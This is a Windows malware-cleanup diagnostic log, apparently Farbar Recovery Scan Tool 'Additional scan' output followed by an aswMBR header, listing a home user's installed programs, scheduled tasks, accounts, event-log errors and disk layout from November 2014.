C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-10-27 16:31
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-02 22:23:56
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
==================== Restore Points =========================
02-11-2014 03:30:39 End of disinfection
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2014-10-30 20:17 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 10:24 - 2011-04-25 10:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 17:43 - 2012-03-19 17:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 08:58 - 2012-03-09 08:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 08:58 - 2012-03-09 08:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 11:20 - 2012-04-17 11:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 13:15 - 2012-03-28 13:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 17:03 - 2012-03-28 09:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2012-10-05 09:50 - 2013-06-28 12:12 - 01371648 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\ssj1mdu.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 13:16 - 2014-01-20 13:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 18:30 - 2012-05-03 16:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 18:30 - 2012-05-03 11:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 18:30 - 2012-04-20 18:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 18:30 - 2012-03-15 12:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 17:03 - 2012-03-28 09:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (11/01/2014 10:36:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 05:05:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ANT Agent.exe, version: 2.3.4.0, time stamp: 0x511ec340
Faulting module name: ANT Agent.exe, version: 2.3.4.0, time stamp: 0x511ec340
Exception code: 0xc0000417
Fault offset: 0x0002a427
Faulting process id: 0xe44
Faulting application start time: 0xANT Agent.exe0
Faulting application path: ANT Agent.exe1
Faulting module path: ANT Agent.exe2
Report Id: ANT Agent.exe3
Error: (11/01/2014 05:04:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 04:14:52 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/31/2014 08:44:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: ResolveSimultaneousProbe: 00000000018D7EA0 Our Record 3 lost: 00366AD0 4 Ryan-PC.local. Addr 192.168.200.26
System errors:
=============
Error: (11/02/2014 09:55:43 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
Error: (11/02/2014 09:34:04 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/02/2014 03:20:26 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
Error: (11/02/2014 03:14:06 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/01/2014 10:36:25 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/01/2014 05:03:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The iPod Service service terminated unexpectedly. It has done this 1 time(s).
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) ME Service service terminated unexpectedly. It has done this 1 time(s).
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA Update Service Daemon service terminated unexpectedly. It has done this 1 time(s).
Microsoft Office Sessions:
=========================
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
Error: (11/01/2014 10:36:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 05:05:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: ANT Agent.exe2.3.4.0511ec340ANT Agent.exe2.3.4.0511ec340c00004170002a427e4401cff61fd73c5c8bC:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exeC:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe2283649d-6213-11e4-8718-006b9e00c96d
Error: (11/01/2014 05:04:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 04:14:52 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestc:\program files (x86)\ESET\eset online scanner\ESETSmartInstaller.exe
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/31/2014 08:44:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: ResolveSimultaneousProbe: 00000000018D7EA0 Our Record 3 lost: 00366AD0 4 Ryan-PC.local. Addr 192.168.200.26
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 42%
Total physical RAM: 8085.95 MB
Available physical RAM: 4674.45 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 11697.59 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:831.05 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
aswMBR version 1.0.1.2172 Copyright(c) 2014 AVAST Software
Run date: 2014-11-02 22:26:24
-----------------------------
22:26:24.834 OS Version: Windows x64 6.1.7601 Service Pack 1
22:26:24.834 Number of processors: 8 586 0x3A09
22:26:24.834 ComputerName: RYAN-PC UserName: Ryan
